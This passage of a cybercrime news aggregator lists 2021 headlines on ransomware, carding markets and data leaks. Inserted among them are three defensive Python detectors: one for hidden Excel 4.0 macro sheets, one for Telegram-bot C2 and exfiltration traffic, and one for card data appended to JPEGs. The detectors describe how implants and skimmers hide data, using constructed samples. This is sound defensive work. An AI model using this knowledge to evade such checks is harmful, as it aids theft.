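The per-IP view catches stuffing from a small number of sources; an attacker spreading the same list across a proxy pool, or spraying one password across every account from many IPs, needs the complementary per-account view (one account seeing failures from many IPs), which this block does not attempt.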


April 30, 2021

UNC2447 cybercrime gang exploited SonicWall Zero-Day before it was fixed Full Text

Abstract UNC2447 cybercrime gang exploited a zero-day in the Secure Mobile Access (SMA), addressed by SonicWall earlier this year, before the vendor released a fix. Researchers from FireEye’s Mandiant revealed that a sophisticated cybercrime gang tracked...

Security Affairs


April 30, 2021

Hacking group that targeted D.C. police briefly posts internal police files Full Text

Abstract The documents posted Wednesday ran into the hundreds of pages and included names, Social Security numbers, phone numbers, financial and housing records, job histories, and polygraph assessments.

Washington Post


April 29, 2021

With Recent Law Enforcement Actions, Emotet’s Days are Now Over Full Text

Abstract Europol claimed to wipe Emotet infection from hundreds of servers globally. The FBI, meanwhile, handed over 4.3 million email addresses to the Have I Been Pwned site to help mitigate infections.

Cyware Alerts - Hacker News


April 29, 2021

Emotet Group Harvested Over 4.3 Million Victim Emails Full Text

Abstract Concerned users can now check with HaveIBeenPwned

Infosecurity Magazine


April 29, 2021

The Sodinokibi Chronicles: A (R)Evil Cybercrime Gang Disrupting Organizations for Trade Secrets and Cash Full Text

Abstract Once Sodinokibi focuses on a potential victim, the attack goes into a more sophisticated operation by human actors who pave their way through the compromised networks to find data and exfiltrate it.

Security Intelligence


April 28, 2021

A Ransomware Gang is Now Shorting Stock Price of its Victims Full Text

Abstract The Darkside group has advanced its extortion tactics to target companies that are listed on NASDAQ or other stock markets. However, the chances of this technique succeeding are narrow, say experts.

Cyware Alerts - Hacker News


April 28, 2021

Cybercriminals Widely Abusing Excel 4.0 Macro to Distribute Malware Full Text

Abstract Threat actors are increasingly adopting Excel 4.0 documents as an initial stage vector to distribute malware such as ZLoader and Quakbot, according to new research. The findings come from an analysis of 160,000 Excel 4.0 documents between November 2020 and March 2021, out of which more than 90% were classified as malicious or suspicious. "The biggest risk for the targeted companies and individuals is the fact that security solutions still have a lot of problems with detecting malicious Excel 4.0 documents, making most of these slip by conventional signature based detections and analyst written YARA rules," researchers from ReversingLabs said in a report published today. Excel 4.0 macros (XLM), the precursor to Visual Basic for Applications (VBA), is a legacy feature incorporated in Microsoft Excel for backward compatibility reasons. Microsoft warns in its support document that enabling all macros can cause "potentially dangerous code" to run. The eve

The Hacker News
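Signature and YARA rules struggle with XLM documents because the macro formulas are spread across cells; a structural check is more durable. In the legacy .xls (BIFF8) format every sheet is announced by a BOUNDSHEET record whose flags carry the sheet type (0x01 means an Excel 4.0 macro sheet) and its visibility state (hidden or "very hidden"), and a hidden macro sheet is the shape these lures take. The parser below is an added example, not code from ReversingLabs or the article. It assumes the Workbook stream has already been pulled out of the OLE2 container (the olefile package does this) and runs on a stream constructed in memory.

```python
"""Flag hidden Excel 4.0 (XLM) macro sheets in a raw BIFF8 Workbook stream.

Added example, not part of the article or ReversingLabs' research. A real .xls
wraps this stream in an OLE2 compound document; extracting the "Workbook"
stream (e.g. with the olefile package) is assumed to have happened already,
so the code below runs on a constructed stream and needs no third-party module.
"""
import struct

BOUNDSHEET = 0x0085      # BIFF record: one per sheet, carries BOF offset, state and type
SHEET_TYPES = {0x00: "worksheet", 0x01: "macro sheet", 0x02: "chart", 0x06: "VBA module"}
VISIBILITY = {0: "visible", 1: "hidden", 2: "very hidden"}


def iter_records(stream: bytes):
    """Yield (opcode, payload) for each BIFF record: 2-byte opcode, 2-byte length, data."""
    pos = 0
    while pos + 4 <= len(stream):
        opcode, length = struct.unpack_from("<HH", stream, pos)
        pos += 4
        yield opcode, stream[pos:pos + length]
        pos += length


def parse_boundsheet(payload: bytes) -> dict:
    """Decode a BOUNDSHEET payload.

    Layout (BIFF8): lbPlyPos (4 bytes, offset of the sheet's BOF), grbit (2 bytes:
    visibility in bits 0-1, sheet type in the high byte), cch (1 byte), a string
    option byte (bit 0 set => UTF-16LE), then the sheet name.
    """
    bof_offset, flags = struct.unpack_from("<IH", payload, 0)
    cch = payload[6]
    wide = payload[7] & 0x01
    raw = payload[8:8 + cch * (2 if wide else 1)]
    name = raw.decode("utf-16-le") if wide else raw.decode("latin-1")
    return {
        "name": name,
        "bof_offset": bof_offset,
        "state": VISIBILITY.get(flags & 0x03, "unknown"),
        "type": SHEET_TYPES.get(flags >> 8, "unknown"),
    }


def find_suspicious_sheets(stream: bytes) -> list:
    """Return the names of XLM macro sheets that are hidden or very hidden."""
    hits = []
    for opcode, payload in iter_records(stream):
        if opcode != BOUNDSHEET:
            continue
        sheet = parse_boundsheet(payload)
        if sheet["type"] == "macro sheet" and sheet["state"] != "visible":
            hits.append(sheet["name"])
    return hits


def build_boundsheet(name: str, state: int, sheet_type: int, bof_offset: int = 0) -> bytes:
    """Build a BOUNDSHEET record; used only to construct sample input for this example."""
    payload = struct.pack("<IH", bof_offset, (sheet_type << 8) | state)
    payload += bytes([len(name), 0]) + name.encode("latin-1")
    return struct.pack("<HH", BOUNDSHEET, len(payload)) + payload


# Constructed sample stream: a visible worksheet plus a "very hidden" macro sheet.
SAMPLE_STREAM = (
    build_boundsheet("Sheet1", 0, 0x00, bof_offset=0x100)
    + build_boundsheet("Macro1", 2, 0x01, bof_offset=0x200)
)

if __name__ == "__main__":
    print(find_suspicious_sheets(SAMPLE_STREAM))  # ['Macro1']
```

A visible macro sheet is not flagged by this check; treat any XLM sheet in mail-borne attachments as worth a look, and pair the structural check with the formula-level indicators (EXEC, CALL, REGISTER and auto-open names) once the sheet's cells are parsed.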


April 26, 2021

Cybercriminals evolving their tactics to exploit collective human interest Full Text

Abstract Phishing activity increased significantly in the first few months of 2020, taking advantage of pandemic-induced product shortages and increased usage of streaming services, OpenText reveals.

Help Net Security


April 23, 2021

US: Ireland Is a Target for Cyber-Criminals Full Text

Abstract Vast amount of data stored on Emerald Isle a lure for cyber-criminals, warns America’s National Security Division

Infosecurity Magazine


April 22, 2021

Spotlight on the Cybercriminal Supply Chains Full Text

Abstract In this Threatpost podcast Fortinet’s top researcher outlines what a cybercriminal supply chain is and how much the illicit market is worth.

Threatpost


April 22, 2021

Way Too Many Cybercriminal Groups Active Presently Full Text

Abstract A new report disclosed that, with more than 1,900 hacker groups active, including APTs, the current cybercrime landscape is witnessing a rise in new malware variants that are being deployed in the wild.

Cyware Alerts - Hacker News


April 22, 2021

Cybercriminals Using Telegram Messenger to Control ToxicEye Malware Full Text

Abstract Adversaries are increasingly abusing Telegram as a "command-and-control" system to distribute malware into organizations that could then be used to capture sensitive information from targeted systems. "Even when Telegram is not installed or being used, the system allows hackers to send malicious commands and operations remotely via the instant messaging app," said researchers from cybersecurity firm Check Point, who have identified no fewer than 130 attacks over the past three months that make use of a new multi-functional remote access trojan (RAT) called "ToxicEye." The use of Telegram for facilitating malicious activities is not new. In September 2019, an information stealer dubbed Masad Stealer was found to plunder information and cryptocurrency wallet data from infected computers using Telegram as an exfiltration channel. Then last year, Magecart groups embraced the same tactic to send stolen payment details from compromised websites back to

The Hacker News
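Because the C2 traffic goes to Telegram's own API over TLS, domain reputation is useless; what gives a Bot-API-based implant away is the combination of the public URL shape (https://api.telegram.org/bot<token>/<method>), a process that is not the Telegram client, and a method mix of polling for commands (getUpdates) plus uploads (sendDocument). The triage below is an added example, not code from Check Point or the article; the proxy log format, the process allowlist and the sample lines (including the bot token) are constructed for it.

```python
"""Triage Telegram Bot API calls from processes that are not Telegram itself.

Added example; not code from the article or Check Point's research. The proxy
log format ("<ts> src=.. proc=.. dst=.. path=.."), the allowlist and the sample
lines are constructed; the bot token in them is made up.
"""
import re
from collections import defaultdict

BOT_API_HOST = "api.telegram.org"
# Public Bot API path shape: /bot<numeric id>:<secret>/<method>
BOT_PATH = re.compile(r"^/bot(\d+:[A-Za-z0-9_-]+)/(\w+)")
ALLOWED_PROCESSES = {"telegram.exe", "telegram"}   # assumption: where the client is sanctioned
EXFIL_METHODS = {"sendDocument", "sendPhoto", "sendVideo", "sendAudio"}


def parse_line(line: str) -> dict:
    """Parse one constructed proxy log line into key=value fields plus the timestamp."""
    ts, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["ts"] = ts
    return rec


def triage(lines) -> dict:
    """Group Bot API calls by (source host, process), skipping the allowlisted client.

    Each finding records the bot token (identifies the operator's bot), the methods
    seen, the call count and whether any upload method was used (exfiltration).
    """
    findings = defaultdict(lambda: {"token": None, "methods": set(), "count": 0})
    for line in lines:
        rec = parse_line(line)
        if rec.get("dst") != BOT_API_HOST:
            continue
        match = BOT_PATH.match(rec.get("path", ""))
        if not match:
            continue
        if rec.get("proc", "").lower() in ALLOWED_PROCESSES:
            continue
        entry = findings[(rec["src"], rec["proc"])]
        entry["token"] = match.group(1)
        entry["methods"].add(match.group(2))
        entry["count"] += 1
    return {
        key: {
            "token": v["token"],
            "methods": sorted(v["methods"]),
            "count": v["count"],
            "exfil": bool(v["methods"] & EXFIL_METHODS),
        }
        for key, v in findings.items()
    }


# Constructed sample: an implant polling for commands and uploading a file,
# the real client on another host, and an unrelated browser visit to web.telegram.org.
SAMPLE_PROXY_LOG = [
    "2021-04-22T09:00:01Z src=10.0.0.5 proc=updater.exe dst=api.telegram.org path=/bot123456789:AAExampleTokenNotReal/getUpdates",
    "2021-04-22T09:00:31Z src=10.0.0.5 proc=updater.exe dst=api.telegram.org path=/bot123456789:AAExampleTokenNotReal/getUpdates",
    "2021-04-22T09:01:02Z src=10.0.0.5 proc=updater.exe dst=api.telegram.org path=/bot123456789:AAExampleTokenNotReal/sendDocument",
    "2021-04-22T09:01:10Z src=10.0.0.9 proc=Telegram.exe dst=api.telegram.org path=/bot987654321:BBAnotherMadeUpToken/getUpdates",
    "2021-04-22T09:01:15Z src=10.0.0.7 proc=chrome.exe dst=web.telegram.org path=/",
]

if __name__ == "__main__":
    for key, finding in triage(SAMPLE_PROXY_LOG).items():
        print(key, finding)
```

The token is the most useful artefact: it is the same on every infected host run by that operator, so it pivots across the fleet and can be reported to Telegram for revocation. Without TLS inspection the path is not visible, and the weaker signal is just a non-Telegram process talking to api.telegram.org at a steady polling interval.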


April 20, 2021

Europol Report Highlights Pandemic’s Effect on Cybercrime Full Text

Abstract Europol’s Serious Organized Crime Threat Assessment report 2021 summarizes the criminal threat of the last four years and provides insights into what to expect over the next four years.

Security Week


April 20, 2021

Crooks stole driver’s license numbers from Geico auto insurer Full Text

Abstract Car insurance provider Geico, the second-largest auto insurer in the U.S., has suffered a data breach: for several weeks, attackers stole driver's license numbers belonging to policyholders. Threat actors exploited...

Security Affairs


April 19, 2021

Crooks made more than $560K with a simple clipboard hijacker Full Text

Abstract Avast researchers analyzed the activity of a simple cryptocurrency malware dubbed HackBoss that allowed its operators to earn over $560K. While the value of major cryptocurrencies continues to increase, cybercriminals and malware authors focus their...

Security Affairs


April 19, 2021

Cybercriminals Claim to Sell 50GB of Data Exfiltrated from OTP-Generating Company Full Text

Abstract Apart from OTP codes, other data included in the sale involved personally identifiable information (PII) such as SMS logs, mobile numbers, email addresses, SMPP details, customer documents, and more.

Hackread


April 16, 2021

Cybercriminals Hacked into Codecov’s Bash Uploader Tool and Stole Customer Credentials for 2.5 Months Full Text

Abstract Codecov said the breach occurred “because of an error in Codecov’s Docker image creation process that allowed the actor to extract the credential required to modify our Bash Uploader script.”

The Record


April 15, 2021

EtterSilent Maldoc Builder - The Hot Selling Cake in Underground Forums Full Text

Abstract According to Intel 471, some cybercriminal groups are leveraging Ettersilent maldoc builder to bypass Windows Defender, Windows AMSI, and top email services including Gmail.

Cyware Alerts - Hacker News


April 15, 2021

Cyber thieves move $760 million stolen in the 2016 Bitfinex heist Full Text

Abstract More than $760 million worth of Bitcoin, stolen from the Asian cryptocurrency exchange Bitfinex in 2016, was moved to new accounts on Wednesday...

Security Affairs


April 15, 2021

Cyber thieves move $760 million stolen in the 2016 Bitfinex heist Full Text

Abstract In August 2016, the Asian exchange Bitfinex suffered a security breach that resulted in the theft of 120,000 Bitcoin; the incident had serious repercussions on the value of Bitcoin, which dropped by about 20% after the breach.

Security Affairs


April 15, 2021

YIKES! Cybercriminals flood the Internet with 100,000 malicious PDF documents Full Text

Abstract Cybercriminals are resorting to search engine poisoning techniques to lure business professionals into seemingly legitimate Google sites that install a Remote Access Trojan (RAT) capable of carrying out a wide range of attacks. The attack works by leveraging searches for business forms such as invoices, templates, questionnaires, and receipts as a stepping stone toward infiltrating the systems. Users attempting to download the alleged document templates are redirected, without their knowledge, to a malicious website that hosts the malware. "Once the RAT is on the victim's computer and activated, the threat actors can send commands and upload additional malware to the infected system, such as ransomware, a credential stealer, a banking trojan, or simply use the RAT as a foothold into the victim's network," researchers from eSentire said in a write-up published on Tuesday. The cybersecurity firm said it discovered over 100,000 unique web pages that contain pop

The Hacker News


April 12, 2021

Europol: “Virtually All” Crime Now Has a Digital Element Full Text

Abstract Criminals are increasingly leveraging digital tech in areas such as communication and finances

Infosecurity Magazine


April 12, 2021

Criminals spread malware using website contact forms with Google URLs Full Text

Abstract Microsoft is warning businesses to beware of cybercriminals using company website contact forms to deliver the IcedID info-stealing banking trojan in email with Google URLs to employees.

ZDNet


April 10, 2021

This man was planning to kill 70% of Internet in a bomb attack against AWS Full Text

Abstract The FBI arrested Seth Aaron Pendley (28), from Texas, for allegedly planning a bomb attack against Amazon Web Services (AWS) that he expected would "kill" about 70% of the internet...

Security Affairs


April 8, 2021

Cybercriminals Crack Cheat Codes and Gaming Mods to Serve Trojans Full Text

Abstract The methodology of the attack involved adding cryptors to cheat codes, cheat engines, and mods that made it challenging for security teams to analyze the attack.

Cyware Alerts - Hacker News


April 06, 2021

EtterSilent maldoc builder used by top cybercriminal gangs Full Text

Abstract A malicious document builder named EtterSilent is gaining more attention on underground forums, security researchers note. As its popularity increased, the developer kept improving it to avoid detection from security solutions.

BleepingComputer


April 5, 2021

Did Facebook’s business model make the company an easier target for cybercriminals? Full Text

Abstract Some researchers argue that the situation showcases why Facebook must revisit how it handles and secures personal information.

SCMagazine


April 5, 2021

Pastor Charged with Sharing CSAM Full Text

Abstract Daytona Beach pastor allegedly shared child sexual abuse material in online chat rooms

Infosecurity Magazine


April 2, 2021

Cybercriminal hacks vaccine marketplace, makes over $752K Full Text

Abstract In a bizarre incident, a hacker has taken down a vaccine marketplace being run on the Dark Web, created fake orders, canceled them, and took a refund in Bitcoins worth $752,000.

The Times Of India


March 31, 2021

5-star customer service: fraudsters launch massive campaign against Indonesia’s major banks on Twitter Full Text

Abstract Experts warn that cybercriminals are targeting Indonesia’s major banks posing as bank representatives or customer support team members on Twitter. Group-IB, a global threat hunting and adversary-centric cyber intelligence company, warns of an ongoing...

Security Affairs


March 30, 2021

#LORCALive: Nation State Cooperation Essential to Fighting Scourge of Cybercrime Full Text

Abstract Can more dialogue be promoted between rival nations?

Infosecurity Magazine


March 23, 2021

Cybercriminals exchange tips on avoiding arrest, jail in underground forums Full Text

Abstract Researchers analyzing underground forums have revealed insight into the methodology behind cyberattacker targets -- as well as what criminals say to do if, or when, they are caught.

ZDNet


March 19, 2021

A Picture is Better than Thousand Words Full Text

Abstract Researchers from Sucuri recently discovered a tactic, practiced by Magecart groups, to hide malicious activity by saving stolen credit card data inside a JPEG file.

Cyware Alerts - Hacker News
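A JPEG viewer stops at the End-Of-Image marker (FF D9), so anything appended after it is invisible to the site owner and still downloadable by the skimmer's operator. The check below is an added example, not code from Sucuri or the article: it walks the JPEG header segments by length (so an EXIF thumbnail's own embedded FF D9 is not mistaken for the end of the file), finds the real EOI after the scan data, and reports the bytes that follow it. The sample images and the appended card records are constructed in memory.

```python
"""Report data appended after a JPEG's End-Of-Image marker.

Added example; not code from the article or from Sucuri. A JPEG starts with
SOI (FF D8) and ends with EOI (FF D9); bytes after EOI are ignored by viewers,
which is what makes an image a convenient drop for harvested card data.
The sample files below are constructed in memory.
"""
import json

SOI = b"\xff\xd8"
EOI = b"\xff\xd9"
SOS = 0xDA


def _segment_end(data: bytes, pos: int) -> int:
    """Index just past the marker segment that starts at pos (data[pos] == 0xFF)."""
    marker = data[pos + 1]
    if marker in (0xD8, 0x01) or 0xD0 <= marker <= 0xD7:
        return pos + 2                                   # standalone markers carry no length
    length = int.from_bytes(data[pos + 2:pos + 4], "big")  # length field counts itself
    return pos + 2 + length


def find_eoi(data: bytes) -> int:
    """Return the offset of the real EOI marker.

    Header segments (APP0, APP1/EXIF, DQT, SOF, DHT ...) are skipped by their
    declared length, so an EXIF thumbnail's embedded FF D9 is never reached.
    Inside entropy-coded scan data every 0xFF is stuffed (FF 00) or an RSTn
    marker, so the first FF D9 after the SOS header is the end of the image.
    """
    if not data.startswith(SOI):
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 1 < len(data) and data[pos] == 0xFF:
        is_sos = data[pos + 1] == SOS
        pos = _segment_end(data, pos)
        if is_sos:
            break
    while pos + 1 < len(data):
        if data[pos] == 0xFF and data[pos + 1] == 0xD9:
            return pos
        pos += 1
    raise ValueError("no EOI marker found")


def trailing_payload(data: bytes) -> bytes:
    """Whatever follows EOI; empty for a clean file."""
    return data[find_eoi(data) + 2:]


def scan_image(data: bytes) -> dict:
    """Summarise the trailing bytes: how many, and whether they look like text records."""
    payload = trailing_payload(data)
    printable = sum(1 for b in payload if 32 <= b < 127 or b in (9, 10, 13))
    return {
        "trailing_bytes": len(payload),
        "mostly_text": bool(payload) and printable / len(payload) > 0.9,
        "suspicious": len(payload) > 0,
    }


def build_sample(appended: bytes) -> bytes:
    """Minimal constructed JPEG: APP0, an APP1 carrying a thumbnail with its own EOI,
    a SOS header, a few scan bytes (one stuffed FF 00), EOI, then `appended`."""
    app0_body = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    app0 = b"\xff\xe0" + (2 + len(app0_body)).to_bytes(2, "big") + app0_body
    app1_body = b"Exif\x00\x00" + SOI + EOI              # embedded thumbnail decoy
    app1 = b"\xff\xe1" + (2 + len(app1_body)).to_bytes(2, "big") + app1_body
    sos_body = b"\x01\x01\x00\x00\x3f\x00"
    sos = b"\xff\xda" + (2 + len(sos_body)).to_bytes(2, "big") + sos_body
    scan = b"\x12\xff\x00\x34"
    return SOI + app0 + app1 + sos + scan + EOI + appended


# Constructed card records in the JSON-ish shape a skimmer might dump (test number, not a real card).
CONSTRUCTED_DUMP = json.dumps([{"cc": "4111111111111111", "exp": "12/24", "cvv": "123"}]).encode()
SAMPLE_CLEAN = build_sample(b"")
SAMPLE_TAMPERED = build_sample(CONSTRUCTED_DUMP)

if __name__ == "__main__":
    print(scan_image(SAMPLE_CLEAN))
    print(scan_image(SAMPLE_TAMPERED))
```

Run this over a site's upload and theme image directories and alert on any non-empty trailing payload; a legitimate image occasionally carries a few padding bytes after EOI, but hundreds of bytes of printable text is a skimmer's drop file until proven otherwise.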


March 15, 2021

OVH Data Center Fire Impacts Cyber-criminals Full Text

Abstract Major fire at Strasbourg data center knocks millions of websites offline and disrupts threat actors

Infosecurity Magazine


March 12, 2021

Cyber criminals targeting hospitals are ‘playing with lives’ and must be stopped, report warns Full Text

Abstract Cyberattacks targeting healthcare are putting patients at unnecessary risk and more must be done to hold the cybercriminals involved to account, warns the CyberPeace Institute.

ZDNet


March 11, 2021

FIN8 cybercrime group resurges with improved hacking tool Full Text

Abstract A financially-motivated hacking group that appeared to drop off the map a year-and-a-half ago is back with a new and improved backdoor, according to Bitdefender research published Wednesday.

Cyberscoop


March 5, 2021

Cybercriminals Target Industrial Organizations in Information Theft Campaign Full Text

Abstract A mysterious cybercrime group apparently driven by profit has been targeting industrial organizations in Europe, Asia and North America as part of an information theft campaign.

Security Week


March 5, 2021

Cybercriminals Finding Ways to Bypass ‘3D Secure’ Fraud Prevention System Full Text

Abstract Security researchers with threat intelligence firm Gemini Advisory say they have observed dark web activities related to bypassing 3D Secure (3DS), which is designed to improve the security of online credit and debit card transactions.

Security Week


March 4, 2021

Cryptocurrency Fraudster Steals $16m Full Text

Abstract Swede admits defrauding over 3,500 victims with elaborate crypto pension scam

Infosecurity Magazine


March 4, 2021

Cybercriminals innovate to find vulnerabilities that can be monetized Full Text

Abstract The healthcare industry remains most at risk, particularly through web gateways, and phishing is still a high-risk vector in this sector, according to cybersecurity experts.

Help Net Security


March 3, 2021

Missing Teens Used School Laptops to Chat with Alleged Abductors Full Text

Abstract Disappearance of North Carolina teenagers allegedly linked to men they met online

Infosecurity Magazine


February 24, 2021

France Warns of Cybercriminals Selling 50,000 Stolen Credentials of Hospital Agents Full Text

Abstract The alert notes that the credential list appears to have been sold on February 4, and that so far "only a few establishment domain names have been identified, which have been notified directly."

Gov Info Security


February 23, 2021

FIN11 cybercrime group is behind recent wave of attacks on FTA servers Full Text

Abstract FireEye experts linked a series of attacks targeting Accellion File Transfer Appliance (FTA) servers to the cybercrime group UNC2546, aka FIN11. Security experts from FireEye linked a series of cyber attacks against organizations running Accellion...

Security Affairs


February 23, 2021

Cybercriminals Misuse Telegram API to Create Malicious Domains to Harvest User Credentials Full Text

Abstract This particular phishing attack appeared active in mid-December 2020 and has since stopped. The targets of these malicious emails mainly worked in the U.K. financial services sector, Cofense notes.

Gov Info Security


February 22, 2021

BBC Reports Theft of 105 Electrical Devices Full Text

Abstract Devices such as laptops and mobile phones taken from BBC premises in the past two years

Infosecurity Magazine


February 19, 2021

Darknet Markets Compete to Replace Joker’s Stash Full Text

Abstract Cybercriminal gangs operating darknet stolen payment card marketplaces are scrambling to attract customers from the now-closed Joker's Stash card market, according to Kela and Flashpoint.

Gov Info Security


February 18, 2021

Cybercriminal Enterprise ‘Ringleaders’ Stole $55M Via COVID-19 Fraud, Romance Scams Full Text

Abstract The Department of Justice (DoJ) cracked down on a Ghana-based cybercriminal enterprise behind a slew of romance scams, COVID-19 fraud attacks and business email compromise schemes since 2013.

Threatpost


February 18, 2021

Software Firm Owner Admits Fraud and CSAM Possession Full Text

Abstract Agents find indecent images of children while investigating Virginia businessman for fraud

Infosecurity Magazine


February 16, 2021

Neighbor Revealed as Cyber-Stalker Full Text

Abstract Durban man admits targeting neighbors in cyber-stalking campaign

Infosecurity Magazine


February 16, 2021

Most Europeans Don’t Know How to Report Cybercrime Full Text

Abstract Brits are among the most clued-up

Infosecurity Magazine


February 16, 2021

270 addresses are responsible for 55% of all cryptocurrency money laundering Full Text

Abstract Criminals who keep their funds in cryptocurrency tend to launder funds through a small cluster of online services, blockchain investigations firm Chainalysis said in a report last week.

ZDNet


February 14, 2021

The kingpin behind Joker’s Stash retires with a billionaire exit Full Text

Abstract The administrator of the most popular carding marketplace on the dark web, Joker's Stash, announced his retirement. The cybercriminal behind the most prominent carding marketplace on the dark web, Joker's Stash, retires; he will shut down its servers and destroy...

Security Affairs


February 12, 2021

Diners Devour Made-to-Order Fraud Full Text

Abstract Cyber-criminals use Telegram to sell food bought with stolen credit cards to hungry users

Infosecurity Magazine


February 12, 2021

Brazilian Authorities Investigate New Cybercriminal Leak of 102 Million Consumers Full Text

Abstract Brazil's National Data Protection Authority (ANPD, in the Portuguese acronym) has informed today (11) that it has started an investigation into the country's second-largest data leak of the year.

ZDNet


February 11, 2021

Love is in the air—and cybercriminals are taking advantage Full Text

Abstract Over 400 individual malicious Valentine's Day-themed phishing email campaigns were spotted on a weekly basis in January, according to data collected by Check Point Research.

Tech Republic


February 10, 2021

Cybercriminals Leverage Discord CDN Service to Target Gamers with Malware Payloads Full Text

Abstract Malware-tainted files are disguised as cracked software or gaming software in order to target gamers – an attractive target for miscreants because they typically use high specification PCs.

The Daily Swig


February 9, 2021

Cybercriminals Claim to Steal Source Code for Cyberpunk 2077, The Witcher 3 Games Developed by CD Projekt Full Text

Abstract Video game company CD Projekt says a cyberattack exposed some of its data, and the intruders left a ransom note claiming they accessed the source code for “Cyberpunk 2077” and other games.

Cyberscoop


February 3, 2021

Retail Sector Still a Favorite Playground for Cybercriminals Full Text

Abstract Retail firms are back among the targets of cyber adversaries; several organizations were hit lately by a variety of threats including phishing campaigns, code injection, and ransomware attacks.

Cyware Alerts - Hacker News


February 3, 2021

Cybercriminals Claim to Leak Police Exam Database Containing 500,000 Indian Citizens’ Personal Details Full Text

Abstract While the threat actor does not mention the name of an organization, the data provided in the sample is potentially associated with a police exam conducted on December 22, 2019.

Security Affairs


January 29, 2021

Cryptocurrency crime drops in 2020 but ‘DeFi’ breaches rise Full Text

Abstract Losses from cryptocurrency theft, hacks, and fraud fell 57% last year to $1.9 billion, but crime in the ‘decentralized finance’ space continued to grow, a report from CipherTrace showed.

Cyber News


January 27, 2021

Personal Details of over 176 million Pakistani Mobile Phone Users Sold on Hacker Forum Full Text

Abstract It can allow cybercriminals to carry out SMSishing, SIM Swapping attacks, and identity scams while State-backed actors can use the data for all sorts of malicious purposes.

Hackread


January 27, 2021

Growing Digital Adoption Providing Extra Opportunities for Cyber-Criminals Full Text

Abstract Rising digital adoption making UK consumers more vulnerable

Infosecurity Magazine


January 26, 2021

Researchers Connect MrbMiner Crypto-Mining Operations to Iranian Software Firm Full Text

Abstract Experts at SophosLabs have linked MrbMiner, a cryptomining malware that surfaced last year and infected thousands of MSSQL databases, to an Iran-based software development company.

Cyware Alerts - Hacker News


January 25, 2021

Over 8 Million Teespring User Records Leaked on Hacker Forum Full Text

Abstract The archive included email addresses and last update dates for 8,242,000 user accounts, full names, phone numbers, locations, and other account details of over 4 million users and apparel creators.

Cyber News


January 23, 2021

A Home Security Tech Hacked Into Cameras To Watch People Undressing And Having Sex, Prosecutors Say Full Text

Abstract A home security technician admitted that he secretly accessed the cameras of more than 200 customers, particularly attractive women, to spy on while they undressed, slept, or had sex.

Buzzfeed


January 23, 2021

Why North Korea Excels in Cybercrime Full Text

Abstract Although the US and the United Nations have levied sanctions meant to prevent the illegal financing of nuclear weapons, North Korea is proving to be adept at sidestepping them — and is also remarkably proficient at cybercrime.

Dark Reading


January 22, 2021

Home Security Technician Admits Spying on Customers Full Text

Abstract Security technician hacked into customers’ home surveillance cameras for sexual gratification

Infosecurity Magazine


January 22, 2021

Court Date for Woman Accused in Theft of Pelosi’s Laptop Full Text

Abstract Pennsylvanian suspected of helping to steal Nancy Pelosi’s laptop to appear before federal court on Monday

Infosecurity Magazine


January 22, 2021

Data of 2 million MyFreeCams users sold on a hacker forum Full Text

Abstract A threat actor was offering for sale on a hacker forum data from 2 million users allegedly stolen from the adult streaming site MyFreeCams. A threat actor was offering for sale on a hacker forum a database containing user records allegedly stolen...

Security Affairs


January 22, 2021

Cybercriminals Resort to Shady Ad Practices that Rip Off Users Full Text

Abstract A report from Group-IB revealed that classified ads scammers have earned more than $6.5 million in 2020, from buyers in a widespread operation dubbed Classiscam.

Cyware Alerts - Hacker News


January 21, 2021

Hackers Leak 325,000 User Records of BuyUCoin Crypto Exchange on the Dark Web Full Text

Abstract The leaked data included names, e-mails, mobile numbers, encrypted passwords, user wallet details, order details, bank details, KYC details, and deposit history of users based in India.

The Times Of India


January 21, 2021

Threat Actor Dumps 1.9 Million Pixlr Records Online Full Text

Abstract ShinyHunters claims to have emails and hashed passwords

Infosecurity Magazine


January 20, 2021

Hacker posts 1.9 million Pixlr user records for free on forum Full Text

Abstract A hacker has leaked 1.9 million Pixlr user records containing information that could be used to perform targeted phishing and credential stuffing attacks.

BleepingComputer


January 20, 2021

Hacker posts 1.4 million Pixlr user records for free on forum Full Text

Abstract A hacker has leaked 1.4 million Pixlr user records containing information that could be used to perform targeted phishing and credential stuffing attacks.

BleepingComputer


January 19, 2021

Hackers Claim to Leak Over 500,000 Records of C-Level Executives From Capital Economics Full Text

Abstract During a routine dark web monitoring, researchers from Cyble found a leak of over 500,000 records of C-level executives from Capital Economics on a Russian-speaking forum.

Security Affairs


January 19, 2021

Joker’s Stash Carding Market to Call it Quits — Krebs on Security Full Text

Abstract Joker’s Stash, which is by some accounts the largest underground shop for selling stolen credit card and identity data, says it’s closing up shop effective mid-February 2021.

Krebs on Security


January 18, 2021

Joker’s Stash Carding Site to Close in February Full Text

Abstract Site admin announces retirement after alleged bout of COVID-19

Infosecurity Magazine


January 18, 2021

Leaked #COVID19 Vaccine Data “Manipulated” to Mislead Public Full Text

Abstract Disinformation effort could undermine trust in vaccines, warns EMA

Infosecurity Magazine


January 18, 2021

Joker’s Stash, the Largest Underground Carding Marketplace, Shuts Down Full Text

Abstract Security experts from the FBI and Interpol have recently seized several servers of the large carder site Joker's Stash, temporarily disrupting the...

Cyber Security News


January 16, 2021

Stolen credit card shop Joker’s Stash closes after making a fortune Full Text

Abstract The administrator of Joker's Stash, one of the longest-running marketplaces for stolen credit cards, announced on Friday that they would permanently shut down the operation next month.

BleepingComputer


January 16, 2021

Massive stolen credit card shop Joker’s Stash shuts down Full Text

Abstract The administrator of Joker's Stash, one of the longest-running marketplaces for stolen credit cards, announced on Friday that they would permanently shut down the operation next month.

BleepingComputer


January 16, 2021

Joker’s Stash, the largest carding site, is shutting down Full Text

Abstract Joker's Stash to shut down on February 15, 2021. Joker’s Stash, the largest carding marketplace online, announced that it was shutting down its operations on February 15, 2021. Joker’s Stash, the largest carding marketplace online, announced...

Security Affairs


January 16, 2021

Joker’s Stash, the internet’s largest carding forum, is shutting down Full Text

Abstract Joker's Stash, the internet's notorious and largest marketplace for buying & selling stolen card data, announced that it was shutting down within a month, on February 15, 2021.

ZDNet


January 15, 2021

Florida Man Cyberstalked Survivor of Murder Attempt Full Text

Abstract Cross City man pleads guilty to cyberstalking woman who survived violent encounter in childhood

Infosecurity Magazine


January 15, 2021

Automated “Classiscam” Operation Made $6.5m in 2020 Full Text

Abstract E-commerce scam-as-a-service comes to Europe from Russia

Infosecurity Magazine


January 14, 2021

Files Allegedly Obtained in SolarWinds Hack Offered for Sale Full Text

